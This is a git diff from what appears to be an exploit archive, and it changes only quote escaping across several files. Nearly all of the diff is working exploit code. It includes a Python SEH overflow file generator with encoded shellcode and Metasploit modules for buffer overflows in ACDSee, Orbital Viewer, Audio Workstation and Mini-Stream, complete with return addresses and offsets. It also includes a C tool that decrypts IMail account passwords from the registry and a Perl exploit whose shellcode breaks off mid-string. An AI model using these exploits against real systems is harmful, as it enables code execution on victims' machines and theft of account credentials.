+    \"\\x49\\x51\\x5a\\x56\\x54\\x58\\x36\\x33\\x30\\x56\\x58\\x34\\x41\\x30\\x42\\x36\"
+    \"\\x48\\x48\\x30\\x42\\x33\\x30\\x42\\x43\\x56\\x58\\x32\\x42\\x44\\x42\\x48\\x34\"
+    \"\\x41\\x32\\x41\\x44\\x30\\x41\\x44\\x54\\x42\\x44\\x51\\x42\\x30\\x41\\x44\\x41\"
+    \"\\x56\\x58\\x34\\x5a\\x38\\x42\\x44\\x4a\\x4f\\x4d\\x4e\\x4f\\x4a\\x4e\\x46\\x44\"
+    \"\\x42\\x30\\x42\\x50\\x42\\x30\\x4b\\x48\\x45\\x54\\x4e\\x43\\x4b\\x38\\x4e\\x47\"  
+    \"\\x45\\x50\\x4a\\x57\\x41\\x30\\x4f\\x4e\\x4b\\x58\\x4f\\x54\\x4a\\x41\\x4b\\x38\"
+    \"\\x4f\\x45\\x42\\x42\\x41\\x50\\x4b\\x4e\\x49\\x44\\x4b\\x38\\x46\\x33\\x4b\\x48\"
+    \"\\x41\\x50\\x50\\x4e\\x41\\x53\\x42\\x4c\\x49\\x59\\x4e\\x4a\\x46\\x58\\x42\\x4c\"
+    \"\\x46\\x57\\x47\\x30\\x41\\x4c\\x4c\\x4c\\x4d\\x30\\x41\\x30\\x44\\x4c\\x4b\\x4e\"
+    \"\\x46\\x4f\\x4b\\x53\\x46\\x55\\x46\\x32\\x46\\x50\\x45\\x47\\x45\\x4e\\x4b\\x58\"
+    \"\\x4f\\x45\\x46\\x52\\x41\\x50\\x4b\\x4e\\x48\\x56\\x4b\\x58\\x4e\\x50\\x4b\\x44\"
+    \"\\x4b\\x48\\x4f\\x55\\x4e\\x41\\x41\\x30\\x4b\\x4e\\x4b\\x58\\x4e\\x41\\x4b\\x38\"
+    \"\\x41\\x50\\x4b\\x4e\\x49\\x48\\x4e\\x45\\x46\\x32\\x46\\x50\\x43\\x4c\\x41\\x33\"
+    \"\\x42\\x4c\\x46\\x46\\x4b\\x38\\x42\\x44\\x42\\x53\\x45\\x38\\x42\\x4c\\x4a\\x47\"
+    \"\\x4e\\x30\\x4b\\x48\\x42\\x44\\x4e\\x50\\x4b\\x58\\x42\\x37\\x4e\\x51\\x4d\\x4a\"
+    \"\\x4b\\x48\\x4a\\x36\\x4a\\x30\\x4b\\x4e\\x49\\x50\\x4b\\x38\\x42\\x58\\x42\\x4b\"
+    \"\\x42\\x50\\x42\\x50\\x42\\x50\\x4b\\x38\\x4a\\x36\\x4e\\x43\\x4f\\x45\\x41\\x53\"
+    \"\\x48\\x4f\\x42\\x46\\x48\\x35\\x49\\x38\\x4a\\x4f\\x43\\x48\\x42\\x4c\\x4b\\x57\"
+    \"\\x42\\x45\\x4a\\x36\\x42\\x4f\\x4c\\x38\\x46\\x30\\x4f\\x35\\x4a\\x46\\x4a\\x39\"
+    \"\\x50\\x4f\\x4c\\x38\\x50\\x50\\x47\\x55\\x4f\\x4f\\x47\\x4e\\x43\\x46\\x41\\x46\"
+    \"\\x4e\\x46\\x43\\x36\\x42\\x50\\x5a\")
 
-    nseh="\x90\x90\xeb\xf6"
-    seh="\x1a\xab\x51\x00"
-    nops="\x90" * 3000
-    nops2="\x90" * 760
-    shell="\xcc" * 600
-    jmp="\xe8\x5b\xfb\xff\xff" #Jmp From Start The My Shellcode 
+    nseh=\"\\x90\\x90\\xeb\\xf6\"
+    seh=\"\\x1a\\xab\\x51\\x00\"
+    nops=\"\\x90\" * 3000
+    nops2=\"\\x90\" * 760
+    shell=\"\\xcc\" * 600
+    jmp=\"\\xe8\\x5b\\xfb\\xff\\xff\" #Jmp From Start The My Shellcode 
     file=str(sys.argv[1])
     
-    op="w"
+    op=\"w\"
     try:
         f=open(file,op)
         f.write(nops+buffer+nops2+jmp+nseh+seh+shell)
         f.close()
         layout()
-        print("[+]Creating File: "+file)
-        print("[+]Identifying Shellcode length")
-        print("[+]The Length of Your Shellcode:"+str(len(buffer)))
-        print("[+]File "+file+" Created Successfully")
+        print(\"[+]Creating File: \"+file)
+        print(\"[+]Identifying Shellcode length\")
+        print(\"[+]The Length of Your Shellcode:\"+str(len(buffer)))
+        print(\"[+]File \"+file+\" Created Successfully\")
     except IOError:
-        print("[+]Error in Create The File")
+        print(\"[+]Error in Create The File\")
diff --git a/platforms/windows/local/16632.rb b/platforms/windows/local/16632.rb
index 5a89c9b5c..95d34e297 100755
--- a/platforms/windows/local/16632.rb
+++ b/platforms/windows/local/16632.rb
@@ -9,7 +9,7 @@
 # http://metasploit.com/framework/
 ##
 
-require 'msf/core'
+require \'msf/core\'
 
 class Metasploit3 < Msf::Exploit::Remote
 	Rank = GoodRanking
@@ -19,47 +19,47 @@ class Metasploit3 < Msf::Exploit::Remote
 
 	def initialize(info = {})
 		super(update_info(info,
-			'Name'           => 'ACDSee XPM File Section Buffer Overflow',
-			'Description'    => %q{
+			\'Name\'           => \'ACDSee XPM File Section Buffer Overflow\',
+			\'Description\'    => %q{
 					This module exploits a buffer overflow in ACDSee 9.0.
 				When viewing a malicious XPM file with the ACDSee product,
 				a remote attacker could overflow a buffer and execute
 				arbitrary code.
 			},
-			'License'        => MSF_LICENSE,
-			'Author'         => 'MC',
-			'Version'        => '$Revision: 10477 $',
-			'References'     =>
+			\'License\'        => MSF_LICENSE,
+			\'Author\'         => \'MC\',
+			\'Version\'        => \'$Revision: 10477 $\',
+			\'References\'     =>
 				[
-					[ 'CVE', '2007-2193' ],
-					[ 'OSVDB', '35236' ],
-					[ 'BID', '23620' ],
+					[ \'CVE\', \'2007-2193\' ],
+					[ \'OSVDB\', \'35236\' ],
+					[ \'BID\', \'23620\' ],
 				],
-			'DefaultOptions' =>
+			\'DefaultOptions\' =>
 				{
-					'EXITFUNC' => 'process',
-					'DisablePayloadHandler' => 'true',
+					\'EXITFUNC\' => \'process\',
+					\'DisablePayloadHandler\' => \'true\',
 				},
-			'Payload'        =>
+			\'Payload\'        =>
 				{
-					'Space'    => 750,
-					'BadChars' => "\x00",
-					'StackAdjustment' => -3500,
-					'EncoderType'   => Msf::Encoder::Type::AlphanumUpper,
-					'DisableNops'   =>  'True',
+					\'Space\'    => 750,
+					\'BadChars\' => \"\\x00\",
+					\'StackAdjustment\' => -3500,
+					\'EncoderType\'   => Msf::Encoder::Type::AlphanumUpper,
+					\'DisableNops\'   =>  \'True\',
 				},
-			'Platform' => 'win',
-			'Targets'        =>
+			\'Platform\' => \'win\',
+			\'Targets\'        =>
 				[
-					[ 'ACDSee 9.0 (Build 1008)', { 'Ret' => 0x10020758 } ],
+					[ \'ACDSee 9.0 (Build 1008)\', { \'Ret\' => 0x10020758 } ],
 				],
-			'Privileged'     => false,
-			'DisclosureDate' => 'Nov 23 2007',
-			'DefaultTarget'  => 0))
+			\'Privileged\'     => false,
+			\'DisclosureDate\' => \'Nov 23 2007\',
+			\'DefaultTarget\'  => 0))
 
 		register_options(
 			[
-				OptString.new('FILENAME', [ true, 'The file name.',  'msf.xpm']),
+				OptString.new(\'FILENAME\', [ true, \'The file name.\',  \'msf.xpm\']),
 			], self.class)
 	end
 
@@ -68,17 +68,17 @@ class Metasploit3 < Msf::Exploit::Remote
 		filler = rand_text_alpha_upper(rand(25) + 1)
 
 		# http://www.fileformat.info/format/xpm/
-		head =  "/* XPM */\r\n"
-		head << "static char * #{filler}[] = {\r\n"
-		head << "\""
+		head =  \"/* XPM */\\r\\n\"
+		head << \"static char * #{filler}[] = {\\r\\n\"
+		head << \"\\\"\"
 
 		buff =  rand_text_alpha_upper(4200) + generate_seh_payload(target.ret)
 
-		foot =  "\",\r\n" + "};\r\n"
+		foot =  \"\\\",\\r\\n\" + \"};\\r\\n\"
 
 		xpm = head + buff + foot
 
-		print_status("Creating '#{datastore['FILENAME']}' file ...")
+		print_status(\"Creating \'#{datastore[\'FILENAME\']}\' file ...\")
 
 		file_create(xpm)
 
diff --git a/platforms/windows/local/16654.rb b/platforms/windows/local/16654.rb
index e066b24dd..e956dcc48 100755
--- a/platforms/windows/local/16654.rb
+++ b/platforms/windows/local/16654.rb
@@ -9,7 +9,7 @@
 # http://metasploit.com/framework/
 ##
 
-require 'msf/core'
+require \'msf/core\'
 
 class Metasploit3 < Msf::Exploit::Remote
 	Rank = GreatRanking
@@ -19,47 +19,47 @@ class Metasploit3 < Msf::Exploit::Remote
 
 	def initialize(info = {})
 		super(update_info(info,
-			'Name'           => 'Orbital Viewer ORB File Parsing Buffer Overflow',
-			'Description'    => %q{
-					This module exploits a stack-based buffer overflow in David Manthey's
+			\'Name\'           => \'Orbital Viewer ORB File Parsing Buffer Overflow\',
+			\'Description\'    => %q{
+					This module exploits a stack-based buffer overflow in David Manthey\'s
 				Orbital Viewer. When processing .ORB files, data is read from file into
 				a fixed-size stack buffer using the fscanf function. Since no bounds
 				checking is done, a buffer overflow can occur. Attackers can execute
 				arbitrary code by convincing their victim to open an ORB file.
 			},
-			'License'        => MSF_LICENSE,
-			'Author' 	     => [ 'jduck' ],
-			'Version'        => '$Revision: 8757 $',
-			'References'     =>
+			\'License\'        => MSF_LICENSE,
+			\'Author\' 	     => [ \'jduck\' ],
+			\'Version\'        => \'$Revision: 8757 $\',
+			\'References\'     =>
 				[
-					[ 'BID', '38436' ],
-					[ 'OSVDB', '62580' ],
-					[ 'CVE', '2010-0688' ],
-					[ 'URL', 'http://www.corelan.be:8800/index.php/forum/security-advisories/corelan-10-011-orbital-viewer-orb-buffer-overflow/' ],
-					[ 'URL', 'http://www.exploit-db.com/exploits/11581' ]
+					[ \'BID\', \'38436\' ],
+					[ \'OSVDB\', \'62580\' ],
+					[ \'CVE\', \'2010-0688\' ],
+					[ \'URL\', \'http://www.corelan.be:8800/index.php/forum/security-advisories/corelan-10-011-orbital-viewer-orb-buffer-overflow/\' ],
+					[ \'URL\', \'http://www.exploit-db.com/exploits/11581\' ]
 				],
-			'Payload'        =>
+			\'Payload\'        =>
 				{
-					'Space'       => 2048,
-					'BadChars'    => "\x00\x09\x0a\x0d\x20", # \xbd was safe in my test, \x09 was not
-					'DisableNops' => true,
+					\'Space\'       => 2048,
+					\'BadChars\'    => \"\\x00\\x09\\x0a\\x0d\\x20\", # \\xbd was safe in my test, \\x09 was not
+					\'DisableNops\' => true,
 				},
-			'Platform'       => 'win',
-			'Targets'        =>
+			\'Platform\'       => \'win\',
+			\'Targets\'        =>
 				[
-					[ 'Orbital Viewer 1.04 on Windows XP SP3',
+					[ \'Orbital Viewer 1.04 on Windows XP SP3\',
 						{
-							'Ret' => 0x004032a2, # p/p/r in ov.exe v1.0.0.2
+							\'Ret\' => 0x004032a2, # p/p/r in ov.exe v1.0.0.2
 						}
 					],
 				],
-			'Privileged'     => false,
-			'DisclosureDate' => 'Feb 27 2010',
-			'DefaultTarget'  => 0))
+			\'Privileged\'     => false,
+			\'DisclosureDate\' => \'Feb 27 2010\',
+			\'DefaultTarget\'  => 0))
 
 		register_options(
 			[
-				OptString.new('FILENAME', [ true, 'The file name.',  'msf.orb']),
+				OptString.new(\'FILENAME\', [ true, \'The file name.\',  \'msf.orb\']),
 			], self.class)
 	end
 
@@ -70,28 +70,28 @@ class Metasploit3 < Msf::Exploit::Remote
 		# One for DnD and File->Open
 		seh2 = seh1 + 2092
 
-		sploit = "OrbitalFileV1.0\r\n"
+		sploit = \"OrbitalFileV1.0\\r\\n\"
 
-		line2 = ''
+		line2 = \'\'
 		nop_count = seh1 - payload.encoded.length
 		line2 << make_nops(nop_count)
 		line2 << payload.encoded
 
 		line2 << generate_seh_record(target.ret)
 		distance = seh1 + 8
-		line2 << Metasm::Shellcode.assemble(Metasm::Ia32.new, "jmp $-" + distance.to_s).encode_string
+		line2 << Metasm::Shellcode.assemble(Metasm::Ia32.new, \"jmp $-\" + distance.to_s).encode_string
 
 		line2 << rand_text_alphanumeric(seh2 - line2.length)
 		line2 << generate_seh_record(target.ret)
 		distance = seh2 + 8
-		line2 << Metasm::Shellcode.assemble(Metasm::Ia32.new, "jmp $-" + distance.to_s).encode_string
+		line2 << Metasm::Shellcode.assemble(Metasm::Ia32.new, \"jmp $-\" + distance.to_s).encode_string
 
 		# Crash writing past end of stack...
 		line2 << rand_text_alphanumeric(1024) * 20
 
 		sploit << line2
 
-		print_status("Creating '#{datastore['FILENAME']}' file ...")
+		print_status(\"Creating \'#{datastore[\'FILENAME\']}\' file ...\")
 
 		file_create(sploit)
 
diff --git a/platforms/windows/local/16661.rb b/platforms/windows/local/16661.rb
index 08a7af28e..ce2929445 100755
--- a/platforms/windows/local/16661.rb
+++ b/platforms/windows/local/16661.rb
@@ -9,7 +9,7 @@
 # http://metasploit.com/framework/
 ##
 
-require 'msf/core'
+require \'msf/core\'
 
 class Metasploit3 < Msf::Exploit::Remote
 	Rank = GoodRanking
@@ -19,47 +19,47 @@ class Metasploit3 < Msf::Exploit::Remote
 
 	def initialize(info = {})
 		super(update_info(info,
-			'Name'           => 'Audio Workstation 6.4.2.4.3 pls Buffer Overflow',
-			'Description'    => %q{
+			\'Name\'           => \'Audio Workstation 6.4.2.4.3 pls Buffer Overflow\',
+			\'Description\'    => %q{
 					This module exploits a buffer overflow in Audio Workstation 6.4.2.4.3.
 				When opening a malicious pls file with the Audio Workstation,
 				a remote attacker could overflow a buffer and execute
 				arbitrary code.
 			},
-			'License'        => MSF_LICENSE,
-			'Author'         => [ 'germaya_x', 'dookie', ],
-			'Version'        => '$Revision: 10477 $',
-			'References'     =>
+			\'License\'        => MSF_LICENSE,
+			\'Author\'         => [ \'germaya_x\', \'dookie\', ],
+			\'Version\'        => \'$Revision: 10477 $\',
+			\'References\'     =>
 				[
-					[ 'CVE', '2009-0476' ],
-					[ 'OSVDB', '55424' ],
-					[ 'URL', 'http://www.exploit-db.com/exploits/10353' ],
+					[ \'CVE\', \'2009-0476\' ],
+					[ \'OSVDB\', \'55424\' ],
+					[ \'URL\', \'http://www.exploit-db.com/exploits/10353\' ],
 				],
-			'DefaultOptions' =>
+			\'DefaultOptions\' =>
 				{
-					'EXITFUNC' => 'seh',
-					'DisablePayloadHandler' => 'true',
+					\'EXITFUNC\' => \'seh\',
+					\'DisablePayloadHandler\' => \'true\',
 				},
-			'Payload'        =>
+			\'Payload\'        =>
 				{
-					'Space'    => 4100,
-					'BadChars' => "\x00",
-					'StackAdjustment' => -3500,
-					'EncoderType'   => Msf::Encoder::Type::AlphanumUpper,
-					'DisableNops'   =>  'True',
+					\'Space\'    => 4100,
+					\'BadChars\' => \"\\x00\",
+					\'StackAdjustment\' => -3500,
+					\'EncoderType\'   => Msf::Encoder::Type::AlphanumUpper,
+					\'DisableNops\'   =>  \'True\',
 				},
-			'Platform' => 'win',
-			'Targets'        =>
+			\'Platform\' => \'win\',
+			\'Targets\'        =>
 				[
-					[ 'Windows Universal', { 'Ret' => 0x1101031E } ], # p/p/r in bass.dll
+					[ \'Windows Universal\', { \'Ret\' => 0x1101031E } ], # p/p/r in bass.dll
 				],
-			'Privileged'     => false,
-			'DisclosureDate' => 'Dec 08 2009',
-			'DefaultTarget'  => 0))
+			\'Privileged\'     => false,
+			\'DisclosureDate\' => \'Dec 08 2009\',
+			\'DefaultTarget\'  => 0))
 
 		register_options(
 			[
-				OptString.new('FILENAME', [ true, 'The file name.',  'msf.pls']),
+				OptString.new(\'FILENAME\', [ true, \'The file name.\',  \'msf.pls\']),
 			], self.class)
 
 	end
@@ -67,13 +67,13 @@ class Metasploit3 < Msf::Exploit::Remote
 	def exploit
 
 		sploit = rand_text_alpha_upper(1308)
-		sploit << "\xeb\x16\x90\x90"
-		sploit << [target.ret].pack('V')
+		sploit << \"\\xeb\\x16\\x90\\x90\"
+		sploit << [target.ret].pack(\'V\')
 		sploit << make_nops(32)
 		sploit << payload.encoded
 		sploit << rand_text_alpha_upper(4652 - payload.encoded.length)
 
-		print_status("Creating '#{datastore['FILENAME']}' file ...")
+		print_status(\"Creating \'#{datastore[\'FILENAME\']}\' file ...\")
 		file_create(sploit)
 
 	end
diff --git a/platforms/windows/local/18082.rb b/platforms/windows/local/18082.rb
index 52474219f..ca8f80b32 100755
--- a/platforms/windows/local/18082.rb
+++ b/platforms/windows/local/18082.rb
@@ -9,7 +9,7 @@
 # http://metasploit.com/framework/
 ##
 
-require 'msf/core'
+require \'msf/core\'
 
 class Metasploit3 < Msf::Exploit::Remote
 	Rank = NormalRanking
@@ -18,77 +18,77 @@ class Metasploit3 < Msf::Exploit::Remote
 
 	def initialize(info = {})
 		super(update_info(info,
-			'Name' => 'Mini-Stream 3.0.1.1 Buffer Overflow Exploit',
-			'Description' => %q{
+			\'Name\' => \'Mini-Stream 3.0.1.1 Buffer Overflow Exploit\',
+			\'Description\' => %q{
 					This module exploits a stack buffer overflow in Mini-Stream 3.0.1.1
 				By creating a specially crafted pls file, an an attacker may be able
 				to execute arbitrary code.
 			},
-			'License' => MSF_LICENSE,
-			'Author' =>
+			\'License\' => MSF_LICENSE,
+			\'Author\' =>
 				[
-					'CORELAN Security Team ',
-					'Ron Henry ', # dijital1; Return address update
+					\'CORELAN Security Team \',
+					\'Ron Henry \', # dijital1; Return address update
 				],
-			'Version' => '$Revision: 14155 $',
-			'References' =>
+			\'Version\' => \'$Revision: 14155 $\',
+			\'References\' =>
 				[
-					[ 'OSVDB', '61341' ],
-					[ 'URL', 'http://www.exploit-db.com/exploits/10745' ],
+					[ \'OSVDB\', \'61341\' ],
+					[ \'URL\', \'http://www.exploit-db.com/exploits/10745\' ],
 				],
-			'DefaultOptions' =>
+			\'DefaultOptions\' =>
 				{
-					'EXITFUNC' => 'thread',
+					\'EXITFUNC\' => \'thread\',
 				},
-			'Payload' =>
+			\'Payload\' =>
 				{
-					'Space' => 3500,
-					'BadChars' => "\x00\x3a\x26\x3f\x25\x23\x20\x0a\x0d\x2f\x2b\x0b\x5c\x26\x3d\x2b\x3f\x3a\x3b\x2d\x2c\x2f\x23\x2e\x5c\x30",
-					'StackAdjustment' => -3500
+					\'Space\' => 3500,
+					\'BadChars\' => \"\\x00\\x3a\\x26\\x3f\\x25\\x23\\x20\\x0a\\x0d\\x2f\\x2b\\x0b\\x5c\\x26\\x3d\\x2b\\x3f\\x3a\\x3b\\x2d\\x2c\\x2f\\x23\\x2e\\x5c\\x30\",
+					\'StackAdjustment\' => -3500
 				},
-			'Platform' => 'win',
-			'Targets' =>
+			\'Platform\' => \'win\',
+			\'Targets\' =>
 				[
 					[
-						'Windows XP SP3 ENG',
+						\'Windows XP SP3 ENG\',
 						{
-							'Ret'    => 0x7e429353,  # 0x7e429353 JMP ESP - USER32.dll
-							'Offset' => 17417
+							\'Ret\'    => 0x7e429353,  # 0x7e429353 JMP ESP - USER32.dll
+							\'Offset\' => 17417
 						}
 					],
 					[
-						'Windows XP SP2 ENG',
+						\'Windows XP SP2 ENG\',
 						{
-							'Ret'    => 0x7c941eed,  # 0x7c941eed JMP ESP - SHELL32.dll
-							'Offset' => 17417
+							\'Ret\'    => 0x7c941eed,  # 0x7c941eed JMP ESP - SHELL32.dll
+							\'Offset\' => 17417
 						}
 					]
 				],
-			'Privileged' => false,
-			'DisclosureDate' => 'Dec 25 2009',
-			'DefaultTarget' => 0))
+			\'Privileged\' => false,
+			\'DisclosureDate\' => \'Dec 25 2009\',
+			\'DefaultTarget\' => 0))
 
 		register_options(
 			[
-				OptString.new('URIPATH',  [ true,  'The URI to use for this exploit', 'msf.pls'])
+				OptString.new(\'URIPATH\',  [ true,  \'The URI to use for this exploit\', \'msf.pls\'])
 			], self.class)
 	end
 
 
 	def on_request_uri(cli, request)
 		# Calculate the correct offset
-		host = (datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address(cli.peerhost) : datastore['SRVHOST']
-		host << ":#{datastore['SRVPORT']}/"
-		offset = target['Offset'] - host.length
+		host = (datastore[\'SRVHOST\'] == \'0.0.0.0\') ? Rex::Socket.source_address(cli.peerhost) : datastore[\'SRVHOST\']
+		host << \":#{datastore[\'SRVPORT\']}/\"
+		offset = target[\'Offset\'] - host.length
 
 		# Construct our buffer
 		sploit = rand_text_alpha(offset)
-		sploit << [target.ret].pack('V')
+		sploit << [target.ret].pack(\'V\')
 		sploit << make_nops(32)
 		sploit << @p
 
-		print_status("Sending malicous payload #{cli.peerhost}:#{cli.peerport}...")
-		send_response(cli, sploit, {'Content-Type'=>'application/pls+xml'})
+		print_status(\"Sending malicous payload #{cli.peerhost}:#{cli.peerport}...\")
+		send_response(cli, sploit, {\'Content-Type\'=>\'application/pls+xml\'})
 	end
 
 	def exploit
diff --git a/platforms/windows/local/19683.c b/platforms/windows/local/19683.c
index bedaf233c..f0d9b3a9f 100755
--- a/platforms/windows/local/19683.c
+++ b/platforms/windows/local/19683.c
@@ -1,8 +1,8 @@
 source: http://www.securityfocus.com/bid/880/info
 
-IMail keeps the encrypted passwords for email accounts in a registry key, HKLM\SOFTWARE\Ipswitch\Imail\Domains\(DomainName)\Users\(UserName), in a string value called "Password". The encryption scheme used is weak and has been broken. The following description of the mechanism used is quoted from Matt Conover's post to Bugtraq, linked to in full in the Credits section.
+IMail keeps the encrypted passwords for email accounts in a registry key, HKLM\\SOFTWARE\\Ipswitch\\Imail\\Domains\\(DomainName)\\Users\\(UserName), in a string value called \"Password\". The encryption scheme used is weak and has been broken. The following description of the mechanism used is quoted from Matt Conover\'s post to Bugtraq, linked to in full in the Credits section.
 
-ENCRYPTION SCHEME Take the lowercase of the account name, split it up by letter and convert each letter to its ASCII equivalent. Next, find the difference between each letter and the first letter. Take each letter of the password, find it's ASCII equivalent and add the offset (ASCII value of first char of the account name minus 97) then subtract the corresponding difference. Use the differences recursively if the password length is greater than the length of the account name. This gives you the character's new ASCII value. Next, Look it up the new ASCII value in the ASCII-ENCRYPTED table (see http://www.w00w00.org/imail_map.txt) and you now have the encrypted letter.
+ENCRYPTION SCHEME Take the lowercase of the account name, split it up by letter and convert each letter to its ASCII equivalent. Next, find the difference between each letter and the first letter. Take each letter of the password, find it\'s ASCII equivalent and add the offset (ASCII value of first char of the account name minus 97) then subtract the corresponding difference. Use the differences recursively if the password length is greater than the length of the account name. This gives you the character\'s new ASCII value. Next, Look it up the new ASCII value in the ASCII-ENCRYPTED table (see http://www.w00w00.org/imail_map.txt) and you now have the encrypted letter.
 
 Example:
 
@@ -42,7 +42,7 @@ offset: (109 - 97) = 12
 
 Encrypted Password: DFD8CED0E0
 
-The decryption scheme is a little easier. First, like the encryption scheme, take the account name, split it up by letter and convert each letter to its ASCII equivalent. Next, find the difference between each letter and the first letter. Now split the encrypted password by two characters (e.g., EFDE = EF DE) then look up their ASCII equivalent within the ASCII-ENCRYPTED table (see http://www.w00w00.org/imail_map.txt). Take that ASCII value and add the corresponding difference.Look this value up in the ascii table. This table is made by taking the ASCII value of the first character of the account name and setting it equal to 'a'.
+The decryption scheme is a little easier. First, like the encryption scheme, take the account name, split it up by letter and convert each letter to its ASCII equivalent. Next, find the difference between each letter and the first letter. Now split the encrypted password by two characters (e.g., EFDE = EF DE) then look up their ASCII equivalent within the ASCII-ENCRYPTED table (see http://www.w00w00.org/imail_map.txt). Take that ASCII value and add the corresponding difference.Look this value up in the ascii table. This table is made by taking the ASCII value of the first character of the account name and setting it equal to \'a\'.
 
 EXAMPLE
 
@@ -109,7 +109,7 @@ struct
 
 struct { char *string; } encrypted[60];
 
-char *list = "0123456789ABCDEF";
+char *list = \"0123456789ABCDEF\";
 
 int alpha[95] = {
   32, 33, 34, 35, 36, 37, 38, 39, 40, 41, 42, 43, 44, 45, 46, 47, 48, 49,
@@ -129,13 +129,13 @@ main (int argc, char *argv[])
   if (argc <= 2 || argc > 3) usage (argv[0]);
   if (strlen (argv[2]) > 62)
   {
-     printf ("\nERROR: Please enter an encrypted password less than 60 "
-             "characters.\n\n");
+     printf (\"\\nERROR: Please enter an encrypted password less than 60 \"
+             \"characters.\\n\\n\");
 
      usage (argv[0]);
   }
 
-  printf ("IMail password decryptor\nBy: Mike \n\n");
+  printf (\"IMail password decryptor\\nBy: Mike \\n\\n\");
 
   ascii = -97;
 
@@ -145,10 +145,10 @@ main (int argc, char *argv[])
      for (k = 0; k < strlen (list); k++)
      {
         hashtable[start].string = (char *) malloc (3);
-        sprintf (hashtable[start].string, "%c%c", list[i], list[k]);
+        sprintf (hashtable[start].string, \"%c%c\", list[i], list[k]);
         hashtable[start].o = ascii++;
 
-        /* Don't want to skip one! */
+        /* Don\'t want to skip one! */
         if ((k + 1) != strlen (list)) start++;
      }
 
@@ -160,7 +160,7 @@ main (int argc, char *argv[])
      for (j = k; j < k + strlen (argv[2]); j += 2, start++)
      {
         encrypted[start].string = (char *) malloc (3);
-        sprintf (encrypted[start].string, "%c%c", argv[2][j],
+        sprintf (encrypted[start].string, \"%c%c\", argv[2][j],
                  argv[2][j + 1]);
      }
   }
@@ -169,13 +169,13 @@ main (int argc, char *argv[])
      for (i = 0; i < strlen (argv[1]); i++, start++)
         diffs[start] = (lc(argv[1][0]) - lc(argv[1][i]));
 
-  printf ("Account Name: %s\n", argv[1]);
+  printf (\"Account Name: %s\\n\", argv[1]);
 
-  printf ("Encrypted: ");
-  for (i = 0; i < strlen (argv[2]) / 2; i++) printf ("%s", encrypted[i]);
-  putchar('\n');
+  printf (\"Encrypted: \");
+  for (i = 0; i < strlen (argv[2]) / 2; i++) printf (\"%s\", encrypted[i]);
+  putchar(\'\\n\');
 
-  printf ("Unencrypted: ");
+  printf (\"Unencrypted: \");
   for (i = 0, loop = 0; i < strlen (argv[2]) / 2; i++, loop++)
   {
      num = search (encrypted[i].string) + diffs[i];
@@ -193,7 +193,7 @@ main (int argc, char *argv[])
      putchar(asciic[num]);
   }
 
-  putchar('\n');
+  putchar(\'\\n\');
   return 0;
 }
 
@@ -221,7 +221,7 @@ eql (char *first, char *second)
 int
 lc (int letter)
 {
-  if (letter >= 'A' && letter <= 'Z') return letter + 'a' - 'A';
+  if (letter >= \'A\' && letter <= \'Z\') return letter + \'a\' - \'A\';
   else return letter;
 }
 
@@ -229,10 +229,10 @@ void
 usage (char *name)
 {
 
-  printf ("IMail password decryptor\n");
-  printf ("By: Mike (Mike@eEye.com)\n\n");
-  printf ("Usage: %s  \n", name);
-  printf ("E.g., %s crypto CCE5DFE5E2\n", name);
+  printf (\"IMail password decryptor\\n\");
+  printf (\"By: Mike (Mike@eEye.com)\\n\\n\");
+  printf (\"Usage: %s  \\n\", name);
+  printf (\"E.g., %s crypto CCE5DFE5E2\\n\", name);
   exit (0);
 }
 
@@ -249,9 +249,9 @@ Their site says:
 
 Until we have positive confirmation, you can set an ACL on each registry
 key containing the password to prevent normal users (while still allowing
-IMail) from viewing other users' passwords.  You are safe to remove read
+IMail) from viewing other users\' passwords.  You are safe to remove read
 permissions on these registry keys--they will not affect IMail (as it
-doesn't run with user privileges).
+doesn\'t run with user privileges).
 
 ---------------------------------------------------------------------------
 People that deserve hellos: eEye, USSR, and Interrupt
diff --git a/platforms/windows/local/26889.pl b/platforms/windows/local/26889.pl
index d2c85dd0e..f4f562cf4 100755
--- a/platforms/windows/local/26889.pl
+++ b/platforms/windows/local/26889.pl
@@ -11,47 +11,47 @@
 # special thanks to corelanc0d3r for his amazing tutorials
 
 
-$file = "blazeExpl.plf";
-$junk = "\x41" x 260;
-$eip = "\x33\xFE\xE4\x77"; #jmp ESP on kernel32.dll
+$file = \"blazeExpl.plf\";
+$junk = \"\\x41\" x 260;
+$eip = \"\\x33\\xFE\\xE4\\x77\"; #jmp ESP on kernel32.dll
 
 #msf win/exec calc.exe [*] x86/alpha_mixed 
-$shellcode = "\x89\xe7\xda\xd4\xd9\x77\xf4\x5b\x53\x59\x49\x49\x49\x49" .
-"\x49\x49\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x37\x51" .
-"\x5a\x6a\x41\x58\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32" .
-"\x41\x42\x32\x42\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41" .
-"\x42\x75\x4a\x49\x49\x6c\x78\x68\x4d\x59\x67\x70\x77\x70" .
-"\x43\x30\x65\x30\x6b\x39\x5a\x45\x76\x51\x59\x42\x52\x44" .
-"\x6e\x6b\x71\x42\x46\x50\x6e\x6b\x56\x32\x36\x6c\x4e\x6b" .
-"\x53\x62\x66\x74\x6c\x4b\x33\x42\x36\x48\x34\x4f\x6f\x47" .
-"\x51\x5a\x75\x76\x75\x61\x39\x6f\x45\x61\x79\x50\x6c\x6c" .
-"\x67\x4c\x70\x61\x53\x4c\x66\x62\x36\x4c\x57\x50\x5a\x61" .
-"\x7a\x6f\x46\x6d\x63\x31\x5a\x67\x4a\x42\x4a\x50\x72\x72" .
-"\x33\x67\x6c\x4b\x76\x32\x76\x70\x6c\x4b\x53\x72\x35\x6c" .
-"\x46\x61\x4a\x70\x6e\x6b\x31\x50\x50\x78\x6b\x35\x39\x50" .
-"\x54\x34\x62\x6a\x67\x71\x4e\x30\x30\x50\x6c\x4b\x52\x68" .
-"\x35\x48\x6e\x6b\x70\x58\x51\x30\x43\x31\x6a\x73\x5a\x43" .
-"\x55\x6c\x43\x79\x6c\x4b\x37\x44\x4c\x4b\x37\x71\x69\x46" .
-"\x36\x51\x39\x6f\x46\x51\x4f\x30\x4e\x4c\x4f\x31\x5a\x6f" .
-"\x64\x4d\x37\x71\x5a\x67\x46\x58\x79\x70\x43\x45\x4b\x44" .
-"\x77\x73\x31\x6d\x4b\x48\x47\x4b\x51\x6d\x46\x44\x50\x75" .
-"\x39\x72\x30\x58\x6c\x4b\x53\x68\x75\x74\x35\x51\x59\x43" .
-"\x65\x36\x6c\x4b\x36\x6c\x52\x6b\x6e\x6b\x42\x78\x47\x6c" .
-"\x63\x31\x48\x53\x6e\x6b\x63\x34\x4e\x6b\x56\x61\x7a\x70" .
